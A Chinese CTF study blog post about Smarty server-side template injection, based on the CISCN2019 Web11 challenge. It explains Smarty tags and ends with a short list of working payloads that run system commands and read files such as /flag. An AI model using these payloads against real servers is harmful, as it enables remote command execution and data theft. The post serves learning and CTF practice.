smarty ssti的学习--Day32

基于[CISCN2019 华东南赛区]Web11这道题目,学习一下smarty sstii
smarty是一个php的模板引擎,提供让程序逻辑与页面显示代码(css/html)分离的功能。

smarty利用

  • {php}

Smarty3官方手册里说到已经废弃{php}标签,强烈建议不要使用。在Smarty3.1,{php}仅在SmartyBC中可用。

  • {literal}
    php5可用,可以让一个模板区域的字符原样输出,经常用于保护页面上的javascrip或css样式表
  • {if}
    Smarty的{if}条件判断和PHP的if 非常相似,只是增加了一些特性。每个{if}必须有一个配对的{/if}. 也可以使用{else} 和 {elseif}, 全部的PHP条件表达式和函数都可以在if内使用,如||,or,&&,and,is_array()等

该题目用burpsuit抓包后根据提示改xff,可以发现存在ssti注入,并且题目中也提示了smarty,那么就可以用{if}{/if}这样的标签来读flag。
在这里插入图片描述
smarty常用payload:

{if phpinfo()}{/if}
{if system('ls')}{/if}
{ readfile('/flag') }
{if show_source('/flag')}{/if}
{if system('cat ../../../flag')}{/if} 
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值